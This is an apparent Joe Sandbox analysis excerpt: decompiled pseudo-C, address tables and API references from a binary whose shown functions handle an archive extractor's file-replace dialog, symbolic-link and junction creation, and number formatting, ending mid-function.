							SendDlgItemMessageW(_t158, 0x67, 0x170, _a1928, 0);
							_t152 =  *0x418464; // 0x0
							E003E138A(_t152, _t156,  &_a4);
							FileTimeToLocalFileTime( &_v0,  &_v24);
							FileTimeToSystemTime( &_v24,  &_v16);
							GetTimeFormatW(0x400, _t162,  &_v16, 0,  &_a8, 0x32);
							GetDateFormatW(0x400, 0,  &_v16, 0,  &_a108, 0x32);
							_push( &_a8);
							_push( &_a108);
							E003D4092( &_a896, _t150, L"%s %s %s", E003DE617(0x99));
							_t168 = _t170 + 0x18;
							SetDlgItemTextW(_t158, 0x6b,  &_a896);
							_t153 =  *0x42ec8c;
							_t157 =  *0x42ec88;
							if((_a304 & 0x00000010) == 0 || (_t157 | _t153) != 0) {
								E003EAF0F(_t157, _t153,  &_a212, 0x32);
								_push(E003DE617(0x98));
								E003D4092( &_a884, _t150, L"%s %s",  &_a192);
								_t168 = _t168 + 0x14;
								SetDlgItemTextW(_t158, 0x69,  &_a884);
							}
						}
						L27:
						_t74 = 0;
						L28:
						return _t74;
					}
					if(_t160 != 1) {
						goto L27;
					}
					_t165 = 2;
					_t137 = (_t148 & 0x0000ffff) - _t165;
					if(_t137 == 0) {
						L11:
						_push(6);
						L12:
						_pop(_t165);
						L13:
						_t138 = SendDlgItemMessageW(_t158, 0x66, 0x171, 0, 0);
						if(_t138 != 0) {
							 *0x4330d0(_t138);
						}
						EndDialog(_t158, _t165);
						goto L1;
					}
					_t142 = _t137 - 0x6a;
					if(_t142 == 0) {
						_t165 = 0;
						goto L13;
					}
					_t143 = _t142 - 1;
					if(_t143 == 0) {
						_t165 = 1;
						goto L13;
					}
					_t144 = _t143 - 1;
					if(_t144 == 0) {
						_push(4);
						goto L12;
					}
					_t145 = _t144 - 1;
					if(_t145 == 0) {
						goto L13;
					}
					_t146 = _t145 - 1;
					if(_t146 == 0) {
						_push(3);
						goto L12;
					}
					if(_t146 != 1) {
						goto L27;
					}
					goto L11;
				}
				L1:
				_t74 = 1;
				goto L28;
			}




























                0x003ec220
                0x003ec225
                0x003ec22b
                0x003ec234
                0x003ec23e
                0x003ec25d
                0x003ec267
                0x003ec26d
                0x003ec2e7
                0x003ec302
                0x003ec311
                0x003ec321
                0x003ec342
                0x003ec358
                0x003ec374
                0x003ec379
                0x003ec38c
                0x003ec39c
                0x003ec3a2
                0x003ec3a8
                0x003ec3a9
                0x003ec3ae
                0x003ec3b1
                0x003ec3b8
                0x003ec3d4
                0x003ec3de
                0x003ec3e6
                0x003ec404
                0x003ec409
                0x003ec417
                0x003ec41e
                0x003ec42c
                0x003ec492
                0x003ec42e
                0x003ec448
                0x003ec44c
                0x003ec45b
                0x003ec463
                0x003ec477
                0x003ec47c
                0x003ec48a
                0x003ec48a
                0x003ec4a7
                0x003ec4ad
                0x003ec4b8
                0x003ec4c7
                0x003ec4d7
                0x003ec4f1
                0x003ec509
                0x003ec513
                0x003ec51b
                0x003ec535
                0x003ec53a
                0x003ec548
                0x003ec556
                0x003ec55c
                0x003ec562
                0x003ec576
                0x003ec585
                0x003ec59c
                0x003ec5a1
                0x003ec5af
                0x003ec5af
                0x003ec562
                0x003ec5b5
                0x003ec5b5
                0x003ec5bb
                0x003ec5c1
                0x003ec5c1
                0x003ec272
                0x00000000
                0x00000000
                0x003ec27d
                0x003ec27e
                0x003ec280
                0x003ec2a4
                0x003ec2a4
                0x003ec2a6
                0x003ec2a6
                0x003ec2a7
                0x003ec2b1
                0x003ec2b9
                0x003ec2bc
                0x003ec2bc
                0x003ec2c4
                0x00000000
                0x003ec2c4
                0x003ec282
                0x003ec285
                0x003ec2d9
                0x00000000
                0x003ec2d9
                0x003ec287
                0x003ec28a
                0x003ec2d6
                0x00000000
                0x003ec2d6
                0x003ec28c
                0x003ec28f
                0x003ec2d0
                0x00000000
                0x003ec2d0
                0x003ec291
                0x003ec294
                0x00000000
                0x00000000
                0x003ec296
                0x003ec299
                0x003ec2cc
                0x00000000
                0x003ec2cc
                0x003ec29e
                0x00000000
                0x00000000
                0x00000000
                0x003ec29e
                0x003ec25f
                0x003ec261
                0x00000000

                APIs
                  • Part of subcall function 003D1316: GetDlgItem.USER32(00000000,00003021), ref: 003D135A
                  • Part of subcall function 003D1316: SetWindowTextW.USER32(00000000,004035F4), ref: 003D1370
                • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 003EC2B1
                • EndDialog.USER32(?,00000006), ref: 003EC2C4
                • GetDlgItem.USER32(?,0000006C), ref: 003EC2E0
                • SetFocus.USER32(00000000), ref: 003EC2E7
                • SetDlgItemTextW.USER32(?,00000065,?), ref: 003EC321
                • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 003EC358
                • FindFirstFileW.KERNEL32(?,?), ref: 003EC36E
                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003EC38C
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 003EC39C
                • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 003EC3B8
                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 003EC3D4
                • _swprintf.LIBCMT ref: 003EC404
                  • Part of subcall function 003D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003D40A5
                • SetDlgItemTextW.USER32(?,0000006A,?), ref: 003EC417
                • FindClose.KERNEL32(00000000), ref: 003EC41E
                • _swprintf.LIBCMT ref: 003EC477
                • SetDlgItemTextW.USER32(?,00000068,?), ref: 003EC48A
                • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 003EC4A7
                • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 003EC4C7
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 003EC4D7
                • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 003EC4F1
                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 003EC509
                • _swprintf.LIBCMT ref: 003EC535
                • SetDlgItemTextW.USER32(?,0000006B,?), ref: 003EC548
                • _swprintf.LIBCMT ref: 003EC59C
                • SetDlgItemTextW.USER32(?,00000069,?), ref: 003EC5AF
                  • Part of subcall function 003EAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 003EAF35
                  • Part of subcall function 003EAF0F: GetNumberFormatW.KERNEL32 ref: 003EAF84
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                • String ID: %s %s$%s %s %s$P>$REPLACEFILEDLG
                • API String ID: 797121971-4187982892
                • Opcode ID: b6f52ac8af16349cac8da39c300e4754ff120220521a57f386c11e4a4a57f004
                • Instruction ID: c8b1f05e99d8c04f03f338c132842ff7d014a036d98bbd8158d7ba570d67aeaa
                • Opcode Fuzzy Hash: b6f52ac8af16349cac8da39c300e4754ff120220521a57f386c11e4a4a57f004
                • Instruction Fuzzy Hash: 0F91D472148394BBD6229FA1DC49FFF7BACEB4A701F004929B745D60C1D775AA058B22
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003D6FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                Download Yara Rule
                C-Code - Quality: 88%
                			E003D6FAA(void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t98;
				void* _t109;
				signed int _t112;
				intOrPtr _t117;
				signed int _t134;
				long _t154;
				void* _t182;
				void* _t186;
				void* _t190;
				void* _t194;
				short _t195;
				void* _t199;
				WCHAR* _t200;
				long _t201;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int _t229;
				intOrPtr* _t233;
				intOrPtr* _t234;
				void* _t236;
				intOrPtr _t237;
				signed int _t238;
				void* _t239;
				intOrPtr _t240;
				signed int _t242;
				intOrPtr _t244;
				short _t245;
				void* _t246;
				intOrPtr _t250;
				short _t252;
				void* _t253;
				void* _t255;
				void* _t256;

				E003EEB78(_t98, _t253);
				E003EEC50(0x30a8);
				if( *0x411023 == 0) {
					E003D7A9C(L"SeRestorePrivilege");
					E003D7A9C(L"SeCreateSymbolicLinkPrivilege");
					 *0x411023 = 1;
				}
				_t203 = _t253 - 0x2c;
				E003D13BA(_t203, 0x1418);
				_t244 =  *((intOrPtr*)(_t253 + 0x10));
				 *(_t253 - 4) =  *(_t253 - 4) & 0x00000000;
				E003E0602(_t253 - 0x107c, _t244 + 0x1104, 0x800);
				 *(_t253 - 0x14) = E003F3E13(_t253 - 0x107c);
				_t236 = _t253 - 0x107c;
				_t199 = _t253 - 0x207c;
				_t109 = E003F6088(_t236, L"\\??\\", 4);
				_t256 = _t255 + 0x10;
				_t204 = _t203 & 0xffffff00 | _t109 == 0x00000000;
				 *(_t253 - 0xd) = _t204;
				if(_t109 == 0) {
					_t236 = _t253 - 0x1074;
				}
				if(_t204 != 0) {
					_t194 = E003F6088(_t236, L"UNC\\", 4);
					_t256 = _t256 + 0xc;
					if(_t194 == 0) {
						_t195 = 0x5c;
						 *((short*)(_t253 - 0x207c)) = _t195;
						_t199 = _t253 - 0x207a;
						_t236 = _t236 + 6;
					}
				}
				E003F6066(_t199, _t236);
				_t112 = E003F3E13(_t253 - 0x207c);
				_t237 =  *((intOrPtr*)(_t253 + 8));
				_t200 =  *(_t253 + 0xc);
				 *(_t253 - 0x18) = _t112;
				if( *((char*)(_t237 + 0x7197)) != 0) {
					L11:
					E003DA0B1(_t200, _t204, _t237, _t253, _t200, 1,  *(_t237 + 0x714b) & 0x000000ff);
					if(E003DA231(_t200) != 0) {
						_t186 = E003DA28F(E003DA243(_t200));
						_push(_t200);
						if(_t186 == 0) {
							E003DA1E0();
						} else {
							E003DA18F();
						}
					}
					if( *((char*)(_t244 + 0x10f1)) != 0 ||  *((char*)(_t244 + 0x2104)) != 0) {
						__eflags = CreateDirectoryW(_t200, 0);
						if(__eflags != 0) {
							goto L20;
						}
						_t201 = 0;
						E003D2021(__eflags, 0x14, 0, _t200);
						E003D6D83(0x411098, 9);
						goto L41;
					} else {
						_t182 = CreateFileW(_t200, 0x40000000, 0, 0, 1, 0x80, 0);
						if(_t182 != 0xffffffff) {
							CloseHandle(_t182);
							L20:
							_t117 =  *((intOrPtr*)(_t244 + 0x1100));
							__eflags = _t117 - 3;
							if(_t117 != 3) {
								__eflags = _t117 - 2;
								if(_t117 == 2) {
									L26:
									_t233 =  *(_t253 - 0x2c);
									_t205 =  *(_t253 - 0x14) & 0x0000ffff;
									_t238 =  *(_t253 - 0x18) & 0x0000ffff;
									 *_t233 = 0xa000000c;
									_t245 = _t205 + _t205;
									 *((short*)(_t233 + 0xa)) = _t245;
									 *((short*)(_t233 + 4)) = 0x10 + (_t238 + _t205) * 2;
									 *((intOrPtr*)(_t233 + 6)) = 0;
									E003F6066(_t233 + 0x14, _t253 - 0x107c);
									_t246 =  *(_t253 - 0x2c);
									 *((short*)(_t246 + 0xc)) = _t245 + 2;
									 *((short*)(_t246 + 0xe)) = _t238 + _t238;
									E003F6066(_t246 + ( *(_t253 - 0x14) + 0xb) * 2, _t253 - 0x207c);
									_t134 =  *(_t253 - 0xd) & 0x000000ff ^ 0x00000001;
									__eflags = _t134;
									 *(_t246 + 0x10) = _t134;
									L27:
									_t239 = CreateFileW(_t200, 0xc0000000, 0, 0, 3, 0x2200000, 0);
									__eflags = _t239 - 0xffffffff;
									if(_t239 != 0xffffffff) {
										__eflags = DeviceIoControl(_t239, 0x900a4, _t246, ( *(_t246 + 4) & 0x0000ffff) + 8, 0, 0, _t253 - 0x30, 0);
										if(__eflags != 0) {
											E003D9556(_t253 - 0x30b4);
											 *(_t253 - 4) = 1;
											E003D7A7B(_t253 - 0x30b4, _t239);
											_t240 =  *((intOrPtr*)(_t253 + 8));
											_t247 =  *((intOrPtr*)(_t253 + 0x10));
											asm("sbb ecx, ecx");
											asm("sbb ecx, ecx");
											asm("sbb ecx, ecx");
											E003D9DA2(_t253 - 0x30b4,  *((intOrPtr*)(_t253 + 0x10)),  ~( *(_t240 + 0x82d0)) &  *((intOrPtr*)(_t253 + 0x10)) + 0x00001040,  ~( *(_t240 + 0x82d4)) & _t247 + 0x00001048,  ~( *(_t240 + 0x82d8)) & _t247 + 0x00001050);
											E003D9620(_t253 - 0x30b4);
											__eflags =  *((char*)(_t240 + 0x71a8));
											if( *((char*)(_t240 + 0x71a8)) == 0) {
												E003DA4ED(_t200,  *((intOrPtr*)(_t247 + 0x24)));
											}
											_t201 = 1;
											E003D959A(_t253 - 0x30b4);
											L41:
											E003D15FB(_t253 - 0x2c);
											 *[fs:0x0] =  *((intOrPtr*)(_t253 - 0xc));
											return _t201;
										}
										CloseHandle(_t239);
										E003D2021(__eflags, 0x15, 0, _t200);
										_t154 = GetLastError();
										__eflags = _t154 - 5;
										if(_t154 == 5) {
											L32:
											__eflags = E003E07BC();
											if(__eflags == 0) {
												E003D15C6(_t253 - 0x7c, 0x18);
												E003E15FE(_t253 - 0x7c);
											}
											L34:
											E003D6DCB(0x411098, __eflags);
											E003D6D83(0x411098, 9);
											_t250 =  *((intOrPtr*)(_t253 + 0x10));
											_push(_t200);
											__eflags =  *((char*)(_t250 + 0x10f1));
											if( *((char*)(_t250 + 0x10f1)) == 0) {
												DeleteFileW();
											} else {
												RemoveDirectoryW();
											}
											L37:
											_t201 = 0;
											goto L41;
										}
										__eflags = _t154 - 0x522;
										if(__eflags != 0) {
											goto L34;
										}
										goto L32;
									}
									E003D6C23(_t200);
									E003D6D83(0x411098, 9);
									goto L37;
								}
								__eflags = _t117 - 1;
								if(_t117 != 1) {
									goto L37;
								}
								goto L26;
							}
							_t234 =  *(_t253 - 0x2c);
							_t229 =  *(_t253 - 0x14) & 0x0000ffff;
							_t242 =  *(_t253 - 0x18) & 0x0000ffff;
							 *_t234 = 0xa0000003;
							_t252 = _t229 + _t229;
							 *((short*)(_t234 + 0xa)) = _t252;
							 *((short*)(_t234 + 4)) = 0xc + (_t242 + _t229) * 2;
							 *((intOrPtr*)(_t234 + 6)) = 0;
							E003F6066(_t234 + 0x10, _t253 - 0x107c);
							_t246 =  *(_t253 - 0x2c);
							 *((short*)(_t246 + 0xc)) = _t252 + 2;
							 *((short*)(_t246 + 0xe)) = _t242 + _t242;
							E003F6066(_t246 + ( *(_t253 - 0x14) + 9) * 2, _t253 - 0x207c);
							goto L27;
						}
						E003D6C23(_t200);
						goto L37;
					}
				}
				if( *(_t253 - 0xd) != 0) {
					goto L37;
				}
				_t190 = E003DBCC3(_t244 + 0x1104);
				_t269 = _t190;
				if(_t190 != 0) {
					goto L37;
				}
				_push(_t244 + 0x1104);
				_push(_t200);
				_push(_t244 + 0x28);
				_push(_t237);
				if(E003D7861(_t269) == 0) {
					goto L37;
				}
				goto L11;
			}








































                0x003d6faa
                0x003d6fb4
                0x003d6fc0
                0x003d6fc7
                0x003d6fd1
                0x003d6fd6
                0x003d6fd6
                0x003d6fe5
                0x003d6fe8
                0x003d6fed
                0x003d6ff0
                0x003d7007
                0x003d701a
                0x003d701d
                0x003d7025
                0x003d7031
                0x003d7036
                0x003d703b
                0x003d703e
                0x003d7043
                0x003d7045
                0x003d7045
                0x003d704d
                0x003d7057
                0x003d705c
                0x003d7061
                0x003d7065
                0x003d7066
                0x003d706d
                0x003d7073
                0x003d7073
                0x003d7061
                0x003d7078
                0x003d7084
                0x003d7089
                0x003d708f
                0x003d7092
                0x003d709c
                0x003d70d6
                0x003d70e1
                0x003d70ee
                0x003d70f7
                0x003d70fc
                0x003d70ff
                0x003d7108
                0x003d7101
                0x003d7101
                0x003d7101
                0x003d70ff
                0x003d7114
                0x003d71e1
                0x003d71e3
                0x00000000
                0x00000000
                0x003d71ea
                0x003d71ef
                0x003d71fb
                0x00000000
                0x003d7127
                0x003d7139
                0x003d7142
                0x003d7155
                0x003d715b
                0x003d715b
                0x003d7161
                0x003d7164
                0x003d7205
                0x003d7208
                0x003d7213
                0x003d7216
                0x003d7219
                0x003d721f
                0x003d7222
                0x003d7228
                0x003d722b
                0x003d7239
                0x003d723f
                0x003d724d
                0x003d7255
                0x003d7258
                0x003d725f
                0x003d7274
                0x003d7280
                0x003d7280
                0x003d7283
                0x003d7286
                0x003d729e
                0x003d72a0
                0x003d72a3
                0x003d72de
                0x003d72e0
                0x003d735d
                0x003d7369
                0x003d736d
                0x003d7372
                0x003d7375
                0x003d7386
                0x003d7399
                0x003d73ac
                0x003d73b7
                0x003d73c2
                0x003d73c7
                0x003d73ce
                0x003d73d4
                0x003d73d4
                0x003d73df
                0x003d73e1
                0x003d73e6
                0x003d73e9
                0x003d73f6
                0x003d73fe
                0x003d73fe
                0x003d72e3
                0x003d72ee
                0x003d72f3
                0x003d72f9
                0x003d72fc
                0x003d7305
                0x003d730a
                0x003d730c
                0x003d7313
                0x003d731b
                0x003d731b
                0x003d7320
                0x003d7327
                0x003d7330
                0x003d7335
                0x003d7338
                0x003d7339
                0x003d7340
                0x003d734a
                0x003d7342
                0x003d7342
                0x003d7342
                0x003d7350
                0x003d7350
                0x00000000
                0x003d7350
                0x003d72fe
                0x003d7303
                0x00000000
                0x00000000
                0x00000000
                0x003d7303
                0x003d72ad
                0x003d72b6
                0x00000000
                0x003d72b6
                0x003d720a
                0x003d720d
                0x00000000
                0x00000000
                0x00000000
                0x003d720d
                0x003d716d
                0x003d7170
                0x003d7176
                0x003d7179
                0x003d717f
                0x003d7182
                0x003d7190
                0x003d7196
                0x003d71a4
                0x003d71ac
                0x003d71af
                0x003d71b6
                0x003d71cb
                0x00000000
                0x003d71d0
                0x003d714a
                0x00000000
                0x003d714a
                0x003d7114
                0x003d70a2
                0x00000000
                0x00000000
                0x003d70af
                0x003d70b4
                0x003d70b6
                0x00000000
                0x00000000
                0x003d70c2
                0x003d70c3
                0x003d70c7
                0x003d70c8
                0x003d70d0
                0x00000000
                0x00000000
                0x00000000

                APIs
                • __EH_prolog.LIBCMT ref: 003D6FAA
                • _wcslen.LIBCMT ref: 003D7013
                • _wcslen.LIBCMT ref: 003D7084
                  • Part of subcall function 003D7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 003D7AAB
                  • Part of subcall function 003D7A9C: GetLastError.KERNEL32 ref: 003D7AF1
                  • Part of subcall function 003D7A9C: CloseHandle.KERNEL32(?), ref: 003D7B00
                  • Part of subcall function 003DA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,003D977F,?,?,003D95CF,?,?,?,?,?,00402641,000000FF), ref: 003DA1F1
                  • Part of subcall function 003DA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,003D977F,?,?,003D95CF,?,?,?,?,?,00402641), ref: 003DA21F
                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 003D7139
                • CloseHandle.KERNEL32(00000000), ref: 003D7155
                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 003D7298
                  • Part of subcall function 003D9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,003D73BC,?,?,?,00000000), ref: 003D9DBC
                  • Part of subcall function 003D9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 003D9E70
                  • Part of subcall function 003D9620: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,003D95D6,?,?,?,?,?,00402641,000000FF), ref: 003D963B
                  • Part of subcall function 003DA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,003DA325,?,?,?,003DA175,?,00000001,00000000,?,?), ref: 003DA501
                  • Part of subcall function 003DA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,003DA325,?,?,?,003DA175,?,00000001,00000000,?,?), ref: 003DA532
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationProcessTime
                • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                • API String ID: 2821348736-3508440684
                • Opcode ID: 1346c4c41e7d97692c6777e519c3662e1628617f7cfccd1bea0b15c76254b84f
                • Instruction ID: 6aa07290f440979722411f01844f6ff097784e9cadb6bacf0723e4ab5d75536f
                • Opcode Fuzzy Hash: 1346c4c41e7d97692c6777e519c3662e1628617f7cfccd1bea0b15c76254b84f
                • Instruction Fuzzy Hash: 8FC1EA76904645AADB22DF74ED42FEEB7ACAF04300F00455BFA56E7381E734AA44CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FD8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODECrypto
                Download Yara Rule
                C-Code - Quality: 68%
                			E003FD8EE(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v32;
				signed int _v36;
				char _v460;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1865;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				intOrPtr _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				char _v1936;
				char _v1944;
				char _v2404;
				signed int _v2408;
				signed int _t743;
				signed int _t753;
				signed int _t754;
				intOrPtr _t763;
				signed int _t764;
				intOrPtr _t767;
				intOrPtr _t770;
				intOrPtr _t772;
				intOrPtr _t773;
				void* _t774;
				signed int _t777;
				signed int _t778;
				signed int _t784;
				void* _t789;
				signed int _t790;
				intOrPtr _t792;
				void* _t793;
				signed int _t794;
				signed int _t795;
				signed int _t796;
				signed int _t805;
				signed int _t810;
				signed int _t811;
				signed int _t812;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t819;
				signed int _t820;
				signed int _t825;
				signed int _t826;
				signed int _t832;
				signed int _t833;
				signed int _t836;
				signed int _t841;
				signed int _t849;
				signed int* _t852;
				signed int _t856;
				signed int _t867;
				signed int _t868;
				signed int _t870;
				char* _t871;
				signed int _t874;
				signed int _t878;
				signed int _t879;
				signed int _t884;
				signed int _t886;
				signed int _t891;
				signed int _t900;
				signed int _t903;
				signed int _t905;
				signed int _t908;
				signed int _t909;
				signed int _t910;
				signed int _t913;
				signed int _t926;
				signed int _t927;
				signed int _t929;
				char* _t930;
				signed int _t933;
				signed int _t937;
				signed int _t938;
				signed int* _t940;
				signed int _t943;
				signed int _t945;
				signed int _t950;
				signed int _t958;
				signed int _t961;
				signed int _t965;
				signed int* _t972;
				intOrPtr _t974;
				void* _t975;
				intOrPtr* _t977;
				signed int* _t981;
				unsigned int _t992;
				signed int _t993;
				void* _t996;
				signed int _t997;
				void* _t999;
				signed int _t1000;
				signed int _t1001;
				signed int _t1002;
				signed int _t1012;
				signed int _t1017;
				signed int _t1020;
				unsigned int _t1023;
				signed int _t1024;
				void* _t1027;
				signed int _t1028;
				void* _t1030;
				signed int _t1031;
				signed int _t1032;
				signed int _t1033;
				signed int _t1038;
				signed int* _t1043;
				signed int _t1045;
				signed int _t1055;
				void* _t1056;
				void _t1058;
				signed int _t1061;
				void* _t1064;
				void* _t1071;
				signed int _t1077;
				signed int _t1078;
				void* _t1080;
				signed int _t1081;
				signed int _t1082;
				signed int _t1084;
				signed int _t1085;
				signed int _t1086;
				signed int _t1090;
				signed int _t1094;
				signed int _t1095;
				signed int _t1096;
				signed int _t1098;
				signed int _t1099;
				signed int _t1100;
				signed int _t1101;
				signed int _t1102;
				signed int _t1103;
				signed int _t1105;
				signed int _t1106;
				signed int _t1107;
				signed int _t1108;
				signed int _t1109;
				signed int _t1110;
				unsigned int _t1111;
				void* _t1114;
				intOrPtr _t1116;
				signed int _t1117;
				signed int _t1118;
				signed int _t1119;
				signed int* _t1123;
				void* _t1127;
				void* _t1128;
				signed int _t1129;
				signed int _t1130;
				signed int _t1131;
				signed int _t1134;
				signed int _t1135;
				signed int _t1140;
				signed int _t1142;
				signed int _t1143;
				signed int _t1151;
				signed int _t1152;
				signed int _t1153;
				signed int _t1154;
				signed int _t1155;
				signed int _t1156;
				signed int _t1157;
				signed int _t1161;
				signed int _t1162;
				signed int _t1163;
				signed int _t1164;
				signed int _t1165;
				unsigned int _t1168;
				void* _t1172;
				void* _t1173;
				unsigned int _t1174;
				signed int _t1179;
				signed int _t1180;
				signed int _t1182;
				signed int _t1183;
				intOrPtr* _t1185;
				signed int _t1186;
				void* _t1187;
				signed int _t1188;
				signed int _t1189;
				signed int _t1192;
				signed int _t1194;
				signed int _t1195;
				void* _t1196;
				signed int _t1197;
				signed int _t1198;
				signed int _t1199;
				void* _t1202;
				signed int _t1203;
				signed int _t1204;
				signed int _t1205;
				signed int _t1206;
				signed int _t1207;
				signed int* _t1210;
				signed int _t1211;
				signed int _t1212;
				signed int _t1213;
				signed int _t1214;
				intOrPtr* _t1216;
				intOrPtr* _t1217;
				signed int _t1219;
				signed int _t1221;
				signed int _t1224;
				signed int _t1230;
				signed int _t1234;
				signed int _t1235;
				void* _t1236;
				signed int _t1240;
				signed int _t1243;
				signed int _t1244;
				signed int _t1245;
				signed int _t1246;
				signed int _t1247;
				signed int _t1248;
				signed int _t1250;
				signed int _t1251;
				signed int _t1252;
				signed int _t1253;
				signed int _t1255;
				signed int _t1256;
				signed int _t1257;
				signed int _t1258;
				signed int _t1259;
				signed int _t1261;
				signed int _t1262;
				signed int _t1264;
				signed int _t1266;
				signed int _t1268;
				signed int _t1271;
				signed int _t1273;
				signed int* _t1274;
				signed int* _t1277;
				signed int _t1286;

				_t1142 = __edx;
				_t1271 = _t1273;
				_t1274 = _t1273 - 0x964;
				_t743 =  *0x40e7ac; // 0xc24f6281
				_v8 = _t743 ^ _t1271;
				_push(__ebx);
				_t1055 = _a20;
				_push(__esi);
				_push(__edi);
				_t1185 = _a16;
				_v1924 = _t1185;
				_v1920 = _t1055;
				E003FD416( &_v1944, __eflags);
				_t1234 = _a8;
				_t748 = 0x2d;
				if((_t1234 & 0x80000000) == 0) {
					_t748 = 0x120;
				}
				 *_t1185 = _t748;
				 *((intOrPtr*)(_t1185 + 8)) = _t1055;
				_t1186 = _a4;
				if((_t1234 & 0x7ff00000) != 0) {
					L5:
					_t753 = E003F9994( &_a4);
					_pop(_t1070);
					__eflags = _t753;
					if(_t753 != 0) {
						_t1070 = _v1924;
						 *((intOrPtr*)(_v1924 + 4)) = 1;
					}
					_t754 = _t753 - 1;
					__eflags = _t754;
					if(_t754 == 0) {
						_push("1#INF");
						goto L308;
					} else {
						_t777 = _t754 - 1;
						__eflags = _t777;
						if(_t777 == 0) {
							_push("1#QNAN");
							goto L308;
						} else {
							_t778 = _t777 - 1;
							__eflags = _t778;
							if(_t778 == 0) {
								_push("1#SNAN");
								goto L308;
							} else {
								__eflags = _t778 == 1;
								if(_t778 == 1) {
									_push("1#IND");
									goto L308;
								} else {
									_v1928 = _v1928 & 0x00000000;
									_a4 = _t1186;
									_a8 = _t1234 & 0x7fffffff;
									_t1286 = _a4;
									asm("fst qword [ebp-0x768]");
									_t1188 = _v1896;
									_v1916 = _a12 + 1;
									_t1077 = _t1188 >> 0x14;
									_t784 = _t1077 & 0x000007ff;
									__eflags = _t784;
									if(_t784 != 0) {
										_t1143 = 0;
										_t784 = 0;
										__eflags = 0;
									} else {
										_t1143 = 1;
									}
									_t1189 = _t1188 & 0x000fffff;
									_t1058 = _v1900 + _t784;
									asm("adc edi, esi");
									__eflags = _t1143;
									_t1078 = _t1077 & 0x000007ff;
									_t1240 = _t1078 - 0x434 + (0 | _t1143 != 0x00000000) + 1;
									_v1872 = _t1240;
									E003FF460(_t1078, _t1286);
									_push(_t1078);
									 *_t1274 = _t1286;
									_t789 = E003FF570();
									_t1080 = _t1078;
